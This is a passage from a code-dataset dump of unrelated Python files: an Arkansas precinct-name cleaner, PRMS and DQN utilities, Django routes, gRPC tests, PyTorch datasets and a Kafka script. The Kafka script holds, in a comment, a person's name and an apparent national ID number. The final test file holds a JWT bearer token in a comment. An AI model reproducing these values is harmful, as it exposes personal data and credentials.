Ward 1\",\n \"White River Ward 2\": \"White River City Ward 2\",\n \"White River Ward 3\": \"White River City Ward 3\",\n })\n\n\ndef pulaski(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=9)\n dat[\"prec\"] = dat[\"prec\"].str.lstrip(\"0\")\n\n\ndef randolph(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Elevenpoint\": \"Eleven point\",\n \"Okean\": \"O'kean\",\n \"Ward One\": \"Ward 1\",\n \"Ward Two\": \"Ward 2\",\n \"Ward Three\": \"Ward 3\",\n })\n\n\ndef saline(dat):\n dat[\"prec\"] = \"Precinct \" + dat[\"prec\"]\n\n\n\ndef scott(dat):\n chop_five(dat)\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Lewis 1\": \"Lewis Ward 1\",\n \"Lewis 2\": \"Lewis Ward 2\",\n \"Lewis 3\": \"Lewis Ward 3\",\n \"Mt. Pleasant\": \"Mount Pleasant\",\n })\n\n\ndef sebastian(dat):\n dat[\"prec\"] = dat[\"prec\"].str.slice(start=9)\n\ndef sevier(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"De Queen Northwest\": \"DQ northwest\",\n })\n\ndef stone(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Angora Mtn\": \"Angora Mountain\",\n \"Dodd Mtn\": \"Dodd Mountain\"\n })\n\n\ndef union(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Country Box # 1\": \"Country Box #1\",\n \"Country Box # 2\": \"Country Box #2\",\n \"Country Box # 3\": \"Country Box #3\",\n \"Country Box # 4\": \"Country Box #4\",\n \"Country Box # 5\": \"Country Box #5\",\n \"Country Box # 6\": \"Country Box #6\",\n \"Country Box # 7\": \"Country Box #7\",\n \"Mt Holly\": \"mt. holly\",\n \"Ward 1\": \"ward #1\",\n \"Ward 2\": \"ward #2\",\n \"Ward 3\": \"ward #3\",\n \"Ward 4\": \"ward #4\",\n \"Woolleys Store\": \"WOOLEYS STORE\",\n })\n\n\ndef washington(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Prairie Gr City - House\": \"Prairie Gr City-House\",\n \"Prairie Gr City - Senate\": \"Prairie Gr City-Senate\",\n \"Richland - Senate\": \"Richland-Senate\",\n \"Fay 01\": \"Fay 1\",\n \"Fay 02\": \"Fay 2\",\n \"Fay 03\": \"Fay 3\",\n \"Fay 04\": \"Fay 4\",\n \"Fay 05\": \"Fay 5\",\n \"Fay 06\": \"Fay 6\",\n \"Fay 07\": \"Fay 7\",\n \"Fay 08\": \"Fay 8\",\n \"Spg 01\": \"Spg 1\",\n \"Spg 02\": \"Spg 2\",\n \"Spg 03\": \"Spg 3\",\n \"Spg 04\": \"Spg 4\",\n \"Spg 05\": \"Spg 5\",\n \"Spg 06\": \"Spg 6\",\n \"Spg 07\": \"Spg 7\",\n \"Spg 08\": \"Spg 8\",\n \"Spg 09\": \"Spg 9\",\n })\n\ndef woodruff(dat):\n dat[\"prec\"] = dat[\"prec\"].replace(\n {\n \"Augusta - 01\": \"Augusta Armory -01\",\n \"Augusta - 02\": \"Augusta Armory-02\",\n \"Augusta - 03\": \"Augusta Hsng Authority-03\",\n \"Cotton Plant - 08\": \"Babbs/Cotton Plant-08\",\n \"Cotton Plant - 09\": \"Babbs/Cotton Plant-09\",\n \"Cotton Plant/ Freeman - 07\": \"Babbs Cottn PL/Freeman-07\",\n \"Fakes Chapel - 20\": \"Fairgrounds Fakes Chpl-20\",\n \"Gregory - 06\": \"Gregory-06\",\n \"Hilleman - 13\": \"White Hall Church-13\",\n \"Howell - 12\": \"Fairgrounds/Howell-12\",\n \"Hunter - 11\": \"Hunter Methodist-11\",\n \"McCrory - 17\": \"McCrory Civic Center-17\",\n \"McCrory - 18\": \"McCrory Civic-18\",\n \"McCrory Rural - 15\": \"Frgrnds/McCrory Rural-15\",\n \"Morton - 14\": \"Morton Baptist-14\",\n \"North Rural Augusta - 04\": \"Augusta Armory-04\",\n \"Patterson - 16\": \"Patterson Fire Station-16\",\n \"Pumkin Bend - 19\": \"Pumpkin Bend Church-19\",\n \"Rural Hunter - 10\": \"Hunter Methodist/Rural-10\",\n \"South Rural Augusta - 05\": \"Augusta Armory-05\",\n })\n\n\"\"\"\noverall call function\n\"\"\"\ncountyToCountyCleaner = {\n \"Arkansas\": arkansas,\n \"Ashley\": ashley,\n \"Baxter\": baxter,\n \"Benton\": benton,\n \"Boone\": boone,\n \"Bradley\": bradley,\n \"Carroll\": carroll,\n \"Chicot\": chicot,\n \"Clark\": clark,\n \"Clay\": clay,\n \"Cleburne\": chop_five,\n \"Cleveland\": cleveland,\n \"Columbia\": columbia,\n \"Conway\": conway,\n \"Crawford\": crawford,\n \"Cross\": cross,\n \"Dallas\": dallas,\n \"Desha\": desha,\n \"Drew\": drew,\n \"Faulkner\": faulkner,\n \"Franklin\": franklin,\n \"Fulton\": fulton,\n \"Garland\": garland,\n \"Grant\": chop_five,\n \"Greene\": greene,\n \"Hempstead\": hempstead,\n \"Hot Spring\": hotspring,\n \"Howard\": howard,\n \"Independence\": independence,\n \"Izard\": izard,\n \"Jackson\": jackson,\n \"Lafayette\": lafayette,\n \"Lawrence\": lawrence,\n \"Lee\": lee,\n \"Lincoln\": lincoln,\n \"Little River\": littleriver,\n \"Logan\": logan,\n \"Lonoke\": lonoke,\n \"Marion\": marion,\n \"Miller\": miller,\n \"Monroe\": monroe,\n \"Montgomery\": montgomery,\n \"Newton\": newton,\n \"Perry\": perry,\n \"Phillips\": phillips,\n \"Pike\": chop_five,\n \"Polk\": polk,\n \"Pope\": pope,\n \"Prairie\": prairie,\n \"Pulaski\": pulaski,\n \"Randolph\": randolph,\n \"Saline\": saline,\n \"Sebastian\": sebastian,\n \"Sevier\": sevier,\n \"Scott\": scott,\n \"Stone\": stone,\n \"Union\": union,\n \"Washington\": washington,\n \"Woodruff\": woodruff,\n \"Yell\": chop_five,\n}\n\n# to test for select counties\n# raw_df = shp_df.loc[\n# (shp_df['county_nam'] == \"Desha\") |\n# (shp_df['county_nam'] == \"Benton\") |\n# (shp_df['county_nam'] == \"Woodruff\")]\n\n# must sort alphabetically in order for second-order function to work\nclean_df = shp_df.sort_values(by=['county_nam'])\n\ncounties = pd.Series(clean_df['county_nam']).unique()\nclean_df[\"prec\"] = clean_df[\"precinct\"].copy()\nclean_df.set_index(['county_nam', 'precinct'], inplace=True)\nprint(\"duplicated indices\", clean_df[clean_df.index.duplicated()])\n\n\nfor county in counties:\n county_dat = clean_df.loc[county]\n changed = countyToCountyCleaner.get(county, lambda x: x)(county_dat)\n clean_df.update(county_dat)\n\nclean_df['prec_edit'] = clean_df['prec'].str.lower()\nclean_df.reset_index(inplace=True)\n\nclean_df.to_file(\"/Users/hopecj/projects/AR/Shapefiles/1_edited_precnames/clean.shp\")\n","sub_path":"AR/edit_prec_names.py","file_name":"edit_prec_names.py","file_ext":"py","file_size_in_byte":29525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"277279719","text":"import os\n\n\nclass Helper(object):\n \"\"\"\n Basic Help class for PRMS parameter variables\n\n The function has two goals, 1) to allow the user to get help on a parameter\n or a variable and 2) allow pyGSFLOW to run error checkers on parameters\n values and sizes\n\n \"\"\"\n\n def __init__(self):\n self.__prms_parameter_names = None\n self.__prms_dimension_names = None\n self.__prms_output_variables = None\n self._read_param_doc()\n self._read_var_doc()\n\n @property\n def prms_parameter_names(self):\n \"\"\"\n Returns a dictionary of prms parameter names that contains\n user information about the specific parameter\n\n \"\"\"\n return self.__prms_parameter_names\n\n @property\n def prms_dimension_names(self):\n \"\"\"\n Returns a dictionary of prms dimension names that contains\n user information about the specific parameter\n\n \"\"\"\n return self.__prms_dimension_names\n\n @property\n def prms_output_variables(self):\n \"\"\"\n Returns a dictionary of prms output variable names that contains\n user information about the specific parameter\n\n \"\"\"\n return self.__prms_output_variables\n\n def _read_param_doc(self):\n \"\"\"\n Reads the PRMS parameter documentation\n \"\"\"\n\n fn = os.path.join(\n os.path.dirname(__file__), r\"gsflow_prms.control.par_name\"\n )\n with open(fn, \"r\") as fid:\n # content = fid.readlines()\n # fid.close()\n is_dim_section = False\n is_par_section = False\n # content = iter(content)\n dimensions = {}\n parameters = {}\n while True:\n try:\n line = fid.readline()\n if \"Bounded\" in line:\n curr_par = dimensions[name.strip()]\n key, value = line.split(\":\")\n curr_par[key] = value\n dimensions[name.strip()] = curr_par\n continue\n except:\n # End of file\n break\n\n if (\n line.strip()\n == \"--------------- DIMENSIONS ---------------\"\n ):\n is_dim_section = True\n is_par_section = False\n continue\n\n if (\n line.strip()\n == \"--------------- PARAMETERS ---------------\"\n ):\n is_par_section = True\n is_dim_section = False\n continue\n\n if not is_dim_section and not is_par_section:\n continue\n\n if is_dim_section:\n if line.strip() == \"\":\n # read three lines\n line = fid.readline()\n key, name = line.split(\":\") # dim name\n\n line = fid.readline()\n key, value = line.split(\":\") # dim value\n\n line = fid.readline()\n key, desc = line.split(\":\") # dim Desc\n\n dimensions[name.strip()] = {\n \"Value\": int(value.strip()),\n \"Desc\": desc.strip(),\n }\n\n if is_par_section:\n if line.strip() == \"\":\n # read three lines\n line = fid.readline()\n key, name = line.split(\":\") # dim name\n curr_par = {}\n for i in range(12):\n line = fid.readline()\n try:\n key, value = line.split(\":\") # dim value\n except:\n pass\n value = value.strip()\n if key.strip() in [\"Ndimen\", \"Size\", \"Width\"]:\n value = int(value)\n if key.strip() == \"Dimensions\":\n values = value.split(\",\")\n value = []\n for v in values:\n dimname, val = v.split(\"-\")\n value.append((dimname, int(val)))\n\n if key.strip() in [\"Max\", \"Min\", \"Default\"]:\n if curr_par[\"Type\"] == \"float\":\n value = float(value)\n elif curr_par[\"Type\"] == \"long\":\n value = int(value)\n else:\n pass # unknow type\n\n curr_par[key.strip()] = value\n\n parameters[name.strip()] = curr_par\n\n self.__prms_parameter_names = parameters\n self.__prms_dimension_names = dimensions\n\n def _read_var_doc(self):\n \"\"\"\n Reads the PRMS output variables documentation\n \"\"\"\n fn = os.path.join(\n os.path.dirname(__file__), r\"gsflow_prms.control.var_name\"\n )\n fid = open(fn, \"r\")\n content = fid.read()\n fid.close()\n content = content.split(\"****\")[1]\n content = content[2:]\n content = content.split(\"\\n\\n\")\n All_variables = dict()\n for line in content:\n recs = line.split(\"\\n\")\n curr_record = dict()\n for rec in recs:\n vv = rec.strip().split(\":\")\n name = vv[0]\n value = \" \".join(vv[1:])\n if name in [\"Ndimen\", \"Size\"]:\n value = int(value)\n\n if name in [\"Dimensions\"]:\n if curr_record[\"Ndimen\"] > 1:\n values = value.split(\",\")\n value = []\n for val in values:\n val = val.split(\"-\")\n val[1] = int(val[1])\n value.append(val)\n else:\n value = value.split(\"-\")\n value[1] = int(value[1])\n\n if name == \"Name\":\n Field_name = value\n else:\n curr_record[name] = value\n All_variables[Field_name] = curr_record\n\n self.__prms_output_variables = All_variables\n","sub_path":"gsflow/prms/prms_help.py","file_name":"prms_help.py","file_ext":"py","file_size_in_byte":6610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"257869518","text":"from agent import DQN\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nfrom csvSaver import Saver\nfrom hyperparams import HyperParameters\n\n\nclass Trainer:\n def __init__(self, env, state_shape, action_size, params):\n self.state_shape = state_shape\n self.action_size = action_size\n self.params = params\n self.env = env\n self.agent = DQN(state_shape, action_size, self.params)\n\n def preprocess(self, img: np.array):\n img = img.astype(np.float32)\n img += np.random.normal(0.0, 0.15, self.state_shape).astype(np.float32)\n img = np.clip(img, 0, 255)\n img = np.expand_dims(img, axis=0)\n return img\n\n def close(self):\n self.env.close()\n\n def run(self, max_epochs, save_interval, save_path, test_nr, verbosity=True):\n saver = Saver(save_path, test_nr, 'test.h5', save_interval, max_epochs, self.params)\n\n times = 0\n scores = 0\n\n for episode in range(max_epochs):\n total_reward = 0\n\n state = self.env.reset()\n state = self.preprocess(state)\n\n for time in range(5000):\n action = self.agent.act(state)\n\n next_state, reward, done, _ = self.env.step(action)\n\n total_reward += reward\n\n next_state = self.preprocess(next_state)\n self.agent.remember(state, action, reward, next_state, done)\n state = next_state\n\n self.agent.replay()\n\n if done:\n scores += total_reward\n times += time\n break\n\n if episode % save_interval == 0:\n score_avg = scores / save_interval\n time_avg = times / save_interval\n scores, times = 0, 0\n saver.write_to_file(episode, time_avg, score_avg, self.agent.epsilon, self.agent.memory.size())\n if verbosity:\n print(\"episode: {}/{}, time: {}, average scores: {}, e: {:.2}, memory: {} \" \\\n .format(episode, max_epochs, time_avg, score_avg, self.agent.epsilon, self.agent.memory.size()))\n","sub_path":"Trainer/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"630726596","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom . import views\n\napp_name = 'online'\nurlpatterns = [\n url(r'^$', views.login, name='login'),\n url(r'^login/$', views.login, name='login'),\n url(r'^regist/$', views.regist, name='regist'),\n url(r'^index/$', views.index, name='index'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^verify/(\\d+)/(\\d+)/$', views.verify, name='verify'),\n url(r'^check/$', views.check, name='check'),\n url(r'^temp/$', views.temp)\n]\n","sub_path":"online/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"4356010","text":"import unittest\nimport time\nfrom blowpipe import client_grpc\nfrom tests.test_constants import *\nfrom tests import test_bp_utils\nfrom blowpipe.logger import Logger\n\n\nclass GRPCClientServerTests(unittest.TestCase):\n \"\"\"\n The purpose of these tests is to assert blind that the client\n can talk to a server (I don't run the server here, it is run\n externally. This allows me to check e.g. a go implementation\n\n The cheat here is I actually do run the server, but I don't do ANY\n checking of it, or the DB.\n \"\"\"\n\n @classmethod\n def setUpClass(self):\n self.server = test_bp_utils.create_blowpipe_server(root_dir=test_bp_utils.DEFAULT_BLOWPIPE_HOME, low_port=9000, high_port=11000)\n self.server.start(blocking=False)\n self.logger = Logger(\"GRPCClientServerTests\")\n time.sleep(2.5)\n\n @classmethod\n def tearDownClass(self):\n self.server.stop()\n time.sleep(2.5)\n\n def setUp(self):\n self.server.db.reset()\n\n def create_client(self):\n client = client_grpc.GRPCClient()\n client.config.set_grpc_port(self.server.config.get_grpc_port())\n client.connect()\n return client\n\n def test_AddWorkflow(self):\n client = self.create_client()\n workflow = test_bp_utils.load_workflow_file(TEST_WORKFLOW_1_FILENAME)\n self.assertEqual(len(client.ListWorkflows()), 0)\n response = client.AddWorkflow(workflow)\n workflow_id = response.id\n self.assertTrue(response.success)\n self.logger.debug(workflow_id)\n self.assertEqual(len(client.ListWorkflows()), 1)\n return workflow_id\n\n def test_DeleteWorkflow(self):\n client = self.create_client()\n workflow_id = self.test_AddWorkflow()\n self.assertEqual(len(client.ListWorkflows()), 1)\n response = client.DeleteWorkflow(workflow_id)\n self.assertTrue(response.success)\n self.assertEqual(len(client.ListWorkflows()), 0)\n\n def test_ListWorkflows(self):\n client = self.create_client()\n workflows = client.ListWorkflows()\n self.assertEqual(len(workflows), 0)\n\n def test_GetWorkflow(self):\n client = self.create_client()\n self.assertEqual(len(client.ListWorkflows()), 0)\n workflow_local = test_bp_utils.load_workflow_file(TEST_WORKFLOW_1_FILENAME)\n response = client.AddWorkflow(workflow_local)\n workflow_remote = client.GetWorkflow(response.id)\n self.assertIsNotNone(workflow_remote)\n\n def test_UpdateWorkflow(self):\n client = self.create_client()\n self.assertEqual(len(client.ListWorkflows()), 0)\n workflow_local = test_bp_utils.load_workflow_file(TEST_WORKFLOW_1_FILENAME)\n response = client.AddWorkflow(workflow_local)\n workflow_remote = client.GetWorkflow(response.id)\n self.assertEqual(workflow_local.get_name(), workflow_remote.get_name())\n\n workflow_id = response.id\n workflow_remote.set_name(\"Foo\")\n reason = \"Setting foo.\"\n update_response = client.UpdateWorkflow(workflow_id, workflow_remote, reason)\n self.assertTrue(update_response.success)\n\n updated_workflow = client.GetWorkflow(workflow_id)\n self.assertEqual(\"Foo\", updated_workflow.get_name())\n\n def test_Status(self):\n client = self.create_client()\n response = client.Status()\n self.logger.debug(response)\n\n def test_WorkflowDefinitionHistory(self):\n # setup\n client = self.create_client()\n self.assertEqual(len(client.ListWorkflows()), 0)\n self.assertEqual(0, len(client.ListWorkflowHistory(\"id\")))\n workflow = test_bp_utils.load_workflow_file(TEST_WORKFLOW_1_FILENAME)\n # create and assert history is size 1\n response = client.AddWorkflow(workflow)\n workflow_id = response.id\n self.assertEqual(1, len(client.ListWorkflowHistory(workflow_id)))\n\n # update it - check history is size 2\n workflow.set_name(\"changed 1\")\n client.UpdateWorkflow(workflow_id, workflow, \"changed 1\")\n self.assertEqual(2, len(client.ListWorkflowHistory(workflow_id)))\n\n workflow.set_name(\"changed 2\")\n client.UpdateWorkflow(workflow_id, workflow, \"changed 2\")\n self.assertEqual(3, len(client.ListWorkflowHistory(workflow_id)))\n\n client.DeleteWorkflow(workflow_id)\n self.assertEqual(4, len(client.ListWorkflowHistory(workflow_id)))\n\n def test_GetAllConfig(self):\n client = self.create_client()\n all_before = client.GetAllConfig()\n self.assertEqual(0, len(all_before))\n response = client.SetConfig(\"key\", \"value\")\n response = client.SetConfig(\"key2\", \"value2\")\n response = client.SetConfig(\"key3\", \"value3\")\n response = client.SetConfig(\"key\", \"value_x\")\n self.assertTrue(response.success)\n all_after = client.GetAllConfig()\n self.assertEqual(3, len(all_after))\n response2 = client.GetConfig(\"Foo\")\n self.assertFalse(response2.success)\n response3 = client.GetConfig(\"key3\")\n self.assertEqual(\"value3\", response3.value)\n\n response4 = client.GetConfig(\"key\")\n self.assertEqual(\"value_x\", response4.value)\n self.assertEqual(\"key\", response4.key)\n self.assertTrue(response4.success)\n\n def test_GetConfig(self):\n client = self.create_client()\n all_before = client.GetAllConfig()\n self.assertEqual(0, len(all_before))\n response = client.SetConfig(\"key\", \"value\")\n self.assertTrue(response.success)\n all_after = client.GetAllConfig()\n self.assertEqual(1, len(all_after))\n response2 = client.GetConfig(\"Foo\")\n self.assertFalse(response2.success)\n\n def test_SetConfig(self):\n client = self.create_client()\n all_before = client.GetAllConfig()\n self.assertEqual(0, len(all_before))\n response = client.SetConfig(\"key\", \"value\")\n self.assertTrue(response.success)\n all_after = client.GetAllConfig()\n self.assertEqual(1, len(all_after))\n\n def test_DeleteConfig(self):\n client = self.create_client()\n all_before = client.GetAllConfig()\n self.assertEqual(0, len(all_before))\n response = client.SetConfig(\"key\", \"value\")\n self.assertTrue(response.success)\n all_after = client.GetAllConfig()\n self.assertEqual(1, len(all_after))\n response2 = client.DeleteConfig(\"key\")\n all_after2 = client.GetAllConfig()\n self.assertTrue(response2.success)\n self.assertEqual(0, len(all_after2))\n\n def test_ManualTrigger_MissingWorkflow(self):\n client = self.create_client()\n workflow_id = \"I do not exist.\"\n response = client.ManualTrigger(workflow_id)\n self.assertFalse(response.success)\n\n \"\"\"\n def test_GetLog(self):\n self.fail(\"Not implemented.\")\n\n def test_SetWorkflowState(self):\n self.fail(\"Not implemented.\")\n \"\"\"\n\n def test_ManualTrigger(self):\n client = self.create_client()\n workflow = test_bp_utils.load_workflow_file(TEST_WORKFLOW_1_FILENAME)\n response = client.AddWorkflow(workflow)\n self.assertTrue(response.success)\n workflow_id = response.id\n\n query_response = client.ListRunningWorkflows()\n self.assertEqual(0, len(query_response))\n\n response = client.ManualTrigger(workflow_id)\n self.assertTrue(response.success)\n self.assertEqual(workflow_id, response.workflow_id)\n self.assertIsNotNone(response.run_id)\n self.assertNotEqual(response.run_id.strip(), \"\")\n self.logger.debug(\"test_ManualTrigger, run_id=\" + response.run_id)\n\n query_response = client.ListRunningWorkflows()\n self.assertEqual(1, len(query_response))\n\n self.logger.debug(\"Waiting for the job to complete.\")\n time.sleep(9)\n\n query_response = client.ListRunningWorkflows()\n self.assertEqual(0, len(query_response))\n\n # so it should have started\n\n\n","sub_path":"code/python/tests/test_client_grpc.py","file_name":"test_client_grpc.py","file_ext":"py","file_size_in_byte":8008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"153606921","text":"import os\nimport pdb\nimport time\nimport h5py\nimport torch\nimport numpy as np\nimport torch.nn as nn\nfrom PIL import Image\nfrom acarpog.util import *\nimport torch.utils.data as data\nfrom acarpog.diagnostics import *\nfrom torchvision import transforms\nimport torchvision.datasets.folder as fl\n#-------------------------------------------------------------------------\n# Functions\n#-------------------------------------------------------------------------\ndef imagenet_transform(scale=224):\n dt_trns = {\n 'train': transforms.Compose([\n transforms.Resize((scale,scale)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ]),\n 'test': transforms.Compose([\n transforms.Resize((scale,scale)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])\n ]),\n }\n return dt_trns\n#-------------------------------------------------------------------------\ndef txt_sloss(txt_route):\n obj = open(txt_route,'r')\n lins = obj.readlines(); i_rs = []; l_im = []\n obj.close()\n cls_l = lins[0]\n clss = cls_l.strip().split(',')\n for ligne in lins[1::]:\n [r_t, lb] = ligne.split(',')\n i_rs.append(r_t)\n l_c = lb.strip()\n l_im.append(l_c)\n return i_rs,l_im,clss\n#-------------------------------------------------------------------------\ndef txt_mloss(txt_route,losses=2):\n obj = open(txt_route,'r')\n lins = obj.readlines(); i_rs = []; l_im = []\n obj.close()\n clss = []\n for x in range(losses):\n clss.append(lins[x].strip().split(','))\n for ligne in lins[losses::]:\n [r_t, lb] = ligne.split(',')\n i_rs.append(r_t)\n l_c = lb.strip()\n l_im.append(l_c)\n return i_rs,l_im,clss\n\n#-------------------------------------------------------------------------\n# Classes\n#-------------------------------------------------------------------------\nclass HDF5Dataset(data.Dataset):\n \"\"\"\n Class HDF5Dataset\n Class implemented to be able to load .h5 dataset files onto pytorch,\n requires the route for the h5.py datset.\n\n \"\"\"\n def __init__(self, data_files):\n lct = os.listdir(data_files)\n lct = filt_dir(lct,'.h5');\n self.data_files = sorted(lct)\n self.dir_dt = data_files;\n def __getitem__(self, index):\n return _load_hdf5_file(os.path.join(self.dir_dt,\n self.data_files[index]))\n def __len__(self):\n return len(self.data_files)\n#-------------------------------------------------------------------------\nclass Singlab_dataset(data.Dataset):\n \"\"\" \n Class Singlab_dataset\n Class implemented to generate a dataset for single category image \n classification\n \n \"\"\"\n def __init__(self,txt_r,transform = None, loader = fl.default_loader,\n txt_fun = txt_sloss):\n [iroutes,ilabs,iclass] = txt_fun(txt_r)\n self.impath = iroutes\n self.imlabs = ilabs\n self.loader = loader\n self.transform = transform\n self.classes = iclass\n def __getitem__(self,index):\n img = self.loader(self.impath[index])\n if self.transform is not None:\n img = self.transform(img)\n kek = self.imlabs[index].strip()\n labels = int(kek)\n return img,labels\n def __len__(self):\n return len(self.imlabs)\t\n#-------------------------------------------------------------------------\nclass Multilab_dataset(data.Dataset):\n \"\"\" \n Class Multilab_dataset\n Class implemented to generate a dataset for multiple category image \n classification\n \n \"\"\"\n def __init__(self,txt_r,transform = None, loader = fl.default_loader,\n txt_fun = txt_sloss):\n [iroutes,ilabs,iclass] = txt_fun(txt_r)\n self.impath = iroutes\n self.imlabs = ilabs\n self.loader = loader\n self.transform = transform\n self.classes = iclass\n def __getitem__(self,index):\n img = self.loader(self.impath[index])\n if self.transform is not None:\n img = self.transform(img)\n l_str = self.imlabs[index]\n l_arr = np.asarray(l_str.split())\n kek = np.asarray(map(int,l_arr))\n labels = torch.from_numpy(kek)\n return img,labels\n def __len__(self):\n return len(self.imlabs)\t\n#-------------------------------------------------------------------------\nclass Softbin_dataset(data.Dataset):\n \"\"\" \n Class Softbin_dataset\n Class implemented to generate a dataset to perform softbinning for \n image regression. \n \n \"\"\"\n def __init__(self,txt_r,transform = None, loader = fl.default_loader,\n txt_fun = txt_sloss):\n [iroutes,ilabs,iclass] = txt_fun(txt_r)\n self.impath = iroutes\n self.imlabs = ilabs\n self.loader = loader\n self.transform = transform\n self.classes = iclass\n def __getitem__(self,index):\n img = self.loader(self.impath[index])\n if self.transform is not None:\n img = self.transform(img)\n l_str = self.imlabs[index]\n l_arr = np.asarray(l_str.split())\n kek = np.asarray(map(float,l_arr))\n labels = torch.from_numpy(kek)\n return img,labels\n def __len__(self):\n return len(self.imlabs)\t\n\n#-------------------------------------------------------------------------\nclass Multiloss_dataset(data.Dataset):\n \"\"\"\n Class Multiloss_dataset\n Class implemented to generate a dataset for multiple classification\n tasks on a single run\n\n \"\"\"\n def __init__(self,txt_r,transform = None,losses=2,\n loader = fl.default_loader):\n [iroutes,ilabs,iclass] = txt_mloss(txt_r,losses)\n self.impath = iroutes\n self.imlabs = ilabs\n self.loader = loader\n self.transform = transform\n self.classes = iclass\n def __getitem__(self,index):\n img = self.loader(self.impath[index])\n if self.transform is not None:\n img = self.transform(img)\n l_str = self.imlabs[index]\n l_arr = np.asarray(l_str.split())\n kek = np.asarray(map(int,l_arr))\n labels = torch.from_numpy(kek)\n return img,labels\n def __len__(self):\n return len(self.imlabs)\n","sub_path":"pytorch/data_class.py","file_name":"data_class.py","file_ext":"py","file_size_in_byte":6326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"476566280","text":"from pykafka import KafkaClient\nfrom pykafka.common import OffsetType\n\nfrom common import settings\n\nquery_params = '{\"attributeMap\":{\"company\":{\"companyName\":\"河南省远创生物科技有限公司\",\"licenceNo\":\"68633903-2\"}},\"header\":{\"callWay\":1,\"orderId\":\"test_200008\"},\"probePubKey\":\"1b8334ced32a4b60ad0a8914de1bc65d\",\"proxyRank\":1}'\n# query_params = '{\"attributeMap\":{\"personal\":{\"name\":\"刘衍洪\",\"idCardNo\":\"51102519681122141X\"}},\"header\":{\"callWay\":1,\"orderId\":\"test_10000\"},\"probePubKey\":\"91135ebe9bec4526be7706abc0c47789\",\"proxyRank\":1}'\n\nclient = KafkaClient(\n hosts=settings.KAFKA_HOST,\n zookeeper_hosts=settings.ZOOKEEPER_HOST,\n)\n\n\ndef start(topic, consume=False, produce=False):\n kafka_producer = client.topics[topic].get_sync_producer(\n max_request_size=1024 * 1024 * 1,\n )\n\n kafka_consumer = client.topics[settings.ASY_PREFIX + topic].get_simple_consumer(\n consumer_group=settings.KAFKA_GROUP,\n fetch_message_max_bytes=1024 * 1024 * 1,\n auto_commit_enable=False,\n auto_offset_reset=OffsetType.EARLIEST,\n reset_offset_on_start=False,\n consumer_id=settings.KAFKA_GROUP_ID\n )\n\n if consume:\n for item in kafka_consumer:\n msg = item.value\n offset = item.offset\n print(offset, msg)\n kafka_consumer.commit_offsets()\n\n if produce:\n kafka_producer.produce(query_params.encode('utf-8'))\n\n\nif __name__ == '__main__':\n start(settings.ASY_01_SHIXIN_COMPANY, consume=True)\n # start(config.ASY_01_SHIXIN_COMPANY, produce=True)\n","sub_path":"script_asy.py","file_name":"script_asy.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"237726677","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\nimport sys\n\nfrom app import create_app\nfrom models import setup_db, Actor, Movie, drop_and_create_all\nfrom datetime import date\nfrom config import TOKENS\n# CASTING_ASSISTANT_AUTH_HEADER = {\n# 'Authorization': \"Bearer eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjNidUcxblJ4VzhDVFNPYkMyanJHZiJ9.eyJpc3MiOiJodHRwczovL2plZmZyZXlmc25kLmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw1ZjIyY2VjZjU4ZTI4NjAwMzcyZjU3ZjYiLCJhdWQiOiJjYXN0aW5nX2FnZW5jeSIsImlhdCI6MTU5NjExNjgxNSwiZXhwIjoxNTk2MjAzMjE0LCJhenAiOiJ1UXZNNDVPNkZmNGpxWm1GbzhiZ1hCckRKUG5KUDVkayIsInNjb3BlIjoiIiwicGVybWlzc2lvbnMiOlsiZ2V0OmFjdG9ycyIsImdldDptb3ZpZXMiXX0.dWuG5mhBpOMNUFXDfx2BwHANEuBsT0RpeOBELfsTlfWPLjPUiiqkadvcl34RNowTnkwxkQT4jqn4B0Cl-wM8tW9ZU2D1NMrsY74j10551FhAtz3BCbYOgZuswEn3KzN-VNhoDRua6xUyUNoSZXJQ92fOMNKa0afCKeSxj4VO6G2D3jQYSMEt28RCXFYjAPiNAO4D63RLqdfqY5a7tfSfq5OlaUZdYFV8vUBV3FxsiSBOO9F2D5wA2wE7_6NmPNS_qcWIsgA1gt4J3_4DwUwyLQUG0frYhPz4gaSGsTYJuWfXg1fyVXJMQvQnTYsdwn3AhjVb7VNxqUut1PtsetwssA\"\n# }\n# CASTING_DIRECTOR_AUTH_HEADER = {\n# 'Authorization': \"Bearer 